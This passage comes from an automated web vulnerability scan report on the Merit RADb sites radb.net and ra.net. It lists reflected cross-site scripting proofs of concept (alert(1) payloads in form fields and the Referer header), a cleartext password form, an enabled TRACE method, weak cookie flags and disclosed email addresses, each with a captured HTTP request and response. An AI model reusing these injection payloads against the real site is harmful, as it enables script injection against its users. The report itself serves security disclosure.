   margin:0px 0px 0px 00px;
   background-color:#444444;
   font-size:12px;
}

body, p, h1, h2,
...[SNIP]...
<input type="text" name="email" size="40" maxlength="60" value="1ae11"><script>alert(1)</script>b4f2a58782bf61bfd">
...[SNIP]...

1.25. https://www.radb.net/portal/password.epl [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/password.epl

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 503ac"><script>alert(1)</script>8ecbce70e9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /portal/password.epl HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?hl=en&q=503ac"><script>alert(1)</script>8ecbce70e9
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:49:26 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Content-Length: 7401
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb Member Portal: Get Your Portal Password</TITLE>

<STYLE TYPE="text/css">
<!--
body {
   margin:0px 0px 0px 00px;
   background-color:#444444;
   font-size:12px;
}

body, p, h1, h2,
...[SNIP]...
<input type="hidden" name="REFERER" value="http://www.google.com/search?hl=en&q=503ac"><script>alert(1)</script>8ecbce70e9">
...[SNIP]...

2. Cleartext submission of password previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.ra.net/register/

The form contains the following password fields:

AUTH_PASSWORD
PASSWORD_AGAIN

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

POST /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 6
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/register/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

STEP=2

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:38:11 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 44967

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...
</TABLE>

<form method=post>
<input type="hidden" name="STEP" value="3">
...[SNIP]...
<td valign=top align=left class=formcontent><input type="password" name="AUTH_PASSWORD" size=20 maxlength=20 value="">
<i>
...[SNIP]...
<td valign=top align=left class=formcontent><input type="password" name="PASSWORD_AGAIN" size=20 maxlength=20 value=""></td>
...[SNIP]...

3. Password field with autocomplete enabled previous next
There are 2 instances of this issue:

http://www.ra.net/register/
https://www.radb.net/login/

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

3.1. http://www.ra.net/register/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Issue detail

The page contains a form with the following action URL:

http://www.ra.net/register/

The form contains the following password fields with autocomplete enabled:

AUTH_PASSWORD
PASSWORD_AGAIN

Request

Response

3.2. https://www.radb.net/login/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.radb.net
Path:	/login/

Issue detail

The page contains a form with the following action URL:

https://www.radb.net/portal/new_login.epl

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET /login/ HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.radb.net/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:48:36 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Set-Cookie: login_error=; path=/; expires=Thu, 22-Sep-2011 12:48:36 GMT
Content-Length: 5233
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb: Member Portal: Login</TITLE>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<STYLE TYPE="text/css">
<!--

body, p, h1, h2, h3, table, td, th, ol, d
...[SNIP]...
<table BORDER="0" CELLPADDING="4" CELLSPACING="0">
<form METHOD="POST" NAME="loginForm" action="/portal/new_login.epl">
<tr>
...[SNIP]...
<td VALIGN="top" ALIGN="left" class="tablecontent"><input type="password" WIDTH="30" maxlength="60" name="PASSWORD" value=""></td>
...[SNIP]...

4. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.radb.net
Path:	/portal/password.epl

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /portal/password.epl HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.radb.net/login/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response 1

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:49:01 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Content-Length: 7349
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb Member Portal: Get Your Portal Password</TITLE>

<STYLE TYPE="text/css">

</script><br><br>
<br>
</td></tr>
</table>

</BODY></HTML>

Request 2

GET /portal/password.epl HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response 2

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:49:14 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Content-Length: 7322
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<HTML>
<head>
<TITLE>RADb Member Portal: Get Your Portal Password</TITLE>

<STYLE TYPE="text/css">

</script><br><br>
<br>
</td></tr>
</table>

</BODY></HTML>

5. SSL cookie without secure flag set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/new_login.epl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

login_error=ERROR%3A%20invalid%20email%20format.%20%20please%20enter%20your%20email%20address%20to%20login.; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

POST /portal/new_login.epl HTTP/1.1
Host: www.radb.net
Connection: keep-alive
Content-Length: 39
Cache-Control: max-age=0
Origin: https://www.radb.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.radb.net/login/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

USER_LOGIN=xss&PASSWORD=xss&login=login

Response

HTTP/1.1 302 Found
Date: Thu, 22 Sep 2011 12:48:53 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Set-Cookie: login_error=ERROR%3A%20invalid%20email%20format.%20%20please%20enter%20your%20email%20address%20to%20login.; path=/
Location: https://www.radb.net/login/
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

6. Cookie without HttpOnly flag set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/new_login.epl

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

login_error=ERROR%3A%20invalid%20email%20format.%20%20please%20enter%20your%20email%20address%20to%20login.; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

Response

7. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ra.net
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.ra.net
Cookie: 2d7de0c2f2c1704a

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:38:02 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ra.net
Cookie: 2d7de0c2f2c1704a

8. Email addresses disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ra.net
Path:	/query/

Issue detail

The following email addresses were disclosed in the response:

dan@broadvoice.com
hostmaster@terremark.com

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

POST /query/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 83
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/query/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

advanced_query=&keywords=204.238.232.0&query=Query&-T+option=&ip_option=&-i+option=

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:40:09 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 31954

<HTML>
<HEAD>
<TITLE>Merit RADb Query</TITLE>
<META NAME="Description" CONTENT="Query the Merit RADb database, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="Merit RAD
...[SNIP]...
<pre>
route: 204.238.232.0/24
descr: Terremark-Proxy for Customer
origin: AS23148
mnt-by: MAINT-AS23148
changed: hostmaster@terremark.com 20100423
source: RADB

route: 204.238.232.0/24
descr: =A0Terremark-Proxy for Customer
origin: AS1784
mnt-by: MAINT-AS23148
changed: hostmaster@terremark.com 20100421
source: RADB

route: 204.238.232.0/24
descr: AS1784-CUST
origin: AS1784
mnt-by: BROADVOICE-MNT
changed: dan@broadvoice.com 20071220
source: LEVEL3

</pre>
...[SNIP]...

9. Cacheable HTTPS response previous next
There are 2 instances of this issue:

/login/
/portal/password.epl

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

9.1. https://www.radb.net/login/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.radb.net
Path:	/login/

Request

Response

9.2. https://www.radb.net/portal/password.epl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/password.epl

Request

GET /portal/password.epl HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.radb.net/login/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

10. HTML does not specify charset previous
There are 5 instances of this issue:

http://www.ra.net/
http://www.ra.net/index.php
http://www.ra.net/query/
http://www.ra.net/register/
https://www.radb.net/portal/password.epl

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

10.1. http://www.ra.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ra.net
Path:	/

Request

GET / HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:38:02 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 23067

<HTML>
<HEAD>
<TITLE>Welcome to Merit RADb</TITLE>
<META NAME="Description" CONTENT="The RADb is a public registry of routing information for networks in the Internet. Hundreds of organizations that o
...[SNIP]...

10.2. http://www.ra.net/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ra.net
Path:	/index.php

Request

GET /index.php HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/query/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:41:15 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 23067

<HTML>
<HEAD>
<TITLE>Welcome to Merit RADb</TITLE>
<META NAME="Description" CONTENT="The RADb is a public registry of routing information for networks in the Internet. Hundreds of organizations that o
...[SNIP]...

10.3. http://www.ra.net/query/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ra.net
Path:	/query/

Request

POST /query/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
Content-Length: 26
Cache-Control: max-age=0
Origin: http://www.ra.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

keywords=pcix&submit=Query

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:40:01 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 31455

<HTML>
<HEAD>
<TITLE>Merit RADb Query</TITLE>
<META NAME="Description" CONTENT="Query the Merit RADb database, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="Merit RAD
...[SNIP]...

10.4. http://www.ra.net/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ra.net
Path:	/register/

Request

GET /register/ HTTP/1.1
Host: www.ra.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.ra.net/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:38:07 GMT
Server: Apache/2.2.20 (Unix) Embperl/2.3.0 mod_ssl/2.2.20 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.3.8 mod_fastcgi/2.4.6 mod_auth_kerb/5.4 mod_perl/2.0.5 Perl/v5.10.0
X-Powered-By: PHP/5.3.8
Last-Modified: Mon, 02 May 2011 10:27:52 EDT
Content-Type: text/html
Content-Length: 27998

<HTML>
<HEAD>
<TITLE>Merit RADb Registration</TITLE>
<META NAME="Description" CONTENT="Register for Merit RADb service, the world's largest public routing registry." />
<META NAME="Keywords" CONTENT="
...[SNIP]...

10.5. https://www.radb.net/portal/password.epl previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.radb.net
Path:	/portal/password.epl

Request

GET /portal/password.epl HTTP/1.1
Host: www.radb.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.radb.net/login/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: goto=L21lbWJlcnMv

Response

Report generated by XSS.CX at Thu Sep 22 15:02:56 CDT 2011.